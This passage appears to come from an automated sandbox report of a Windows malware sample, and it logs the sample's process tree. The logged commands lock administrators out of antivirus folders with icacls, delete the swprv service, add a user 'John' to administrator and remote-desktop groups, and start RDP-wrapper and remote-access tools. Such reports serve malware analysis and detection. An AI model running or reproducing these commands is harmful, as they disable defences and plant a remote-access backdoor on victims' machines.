        
        PID:4348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:4592
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2704
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:4388
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:1224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3792
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:2580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:3132
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2040
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:2864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:1212
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
      4⤵
      PID:4616
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:3332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
      4⤵
      PID:2260
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
      4⤵
      PID:4560
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
      4⤵
      PID:2688
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
      4⤵
      PID:4864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny System:(F)
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
      4⤵
      PID:3120
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:1700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:2368
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:4152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
      4⤵
      PID:4184
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:3636
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        
        PID:3368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
      4⤵
      PID:2740
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:2704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
      4⤵
      PID:4576
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
      4⤵
      PID:4792
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
        5⤵
        
        PID:3552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
      4⤵
      PID:616
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
      4⤵
      PID:4200
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:1124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
      4⤵
      PID:3440
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:4376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:928
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5024
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2548
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1652
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4804
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:908
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:1832
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3764
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1156
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2224
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4596
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:444
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4340
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2176
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3376
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4968
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4000
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3148
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4628
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:2056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:1304
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4196
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:4068
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2820
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3764
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3380
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4592
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3492
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:4576
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2496
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1740
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:1272
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1296
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:2548
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:3888
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:2056
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:1144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:4536

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:4076

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
1⤵
- Executes dropped EXE
PID:1760
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: SetClipboardViewer
  PID:1904

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
1⤵
- Executes dropped EXE
PID:1004

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
1⤵
- Checks computer location settings
- Modifies registry class
PID:2460
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im Rar.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\SysWOW64\timeout.exe
  timeout 3
  2⤵
  - Delays execution with timeout.exe
  PID:4872
- C:\Windows\SysWOW64\chcp.com
  chcp 1251
  2⤵
  PID:2164
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im Rar.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\rdp\Rar.exe
  "Rar.exe" e -p555 db.rar
  2⤵
  PID:4296
- C:\Windows\SysWOW64\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:1460
- C:\Windows\SysWOW64\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:4352
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
  2⤵
  - Checks computer location settings
  PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
    3⤵
    PID:4984
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Администраторы" "John" /add
      4⤵
      PID:3236
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:3308
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Administratorzy" "John" /add
      4⤵
      PID:3928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        5⤵
        
        PID:2056
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Administrators" John /add
      4⤵
      PID:4408
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        5⤵
        
        PID:3596
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Administradores" John /add
      4⤵
      PID:2552
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        5⤵
        
        PID:3976
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Пользователи удаленного рабочего стола" John /add
      4⤵
      PID:4472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        5⤵
        
        PID:3148
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Пользователи удаленного управления" John /add
      4⤵
      PID:2264
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        5⤵
        
        PID:2012
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" John /add
      4⤵
      PID:344
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Usuarios de escritorio remoto" John /add
      4⤵
      PID:1304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        5⤵
        
        PID:2304
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Uzytkownicy pulpitu zdalnego" John /add
      4⤵
      PID:624
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        5⤵
        
        PID:1832
  - - C:\rdp\RDPWInst.exe
      "RDPWInst.exe" -i -o
      4⤵
      Executes dropped EXE
      Sets DLL path for service in the registry
      Modifies WinLogon
      Drops file in System32 directory
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:2772
    - - C:\Windows\SYSTEM32\netsh.exe
        
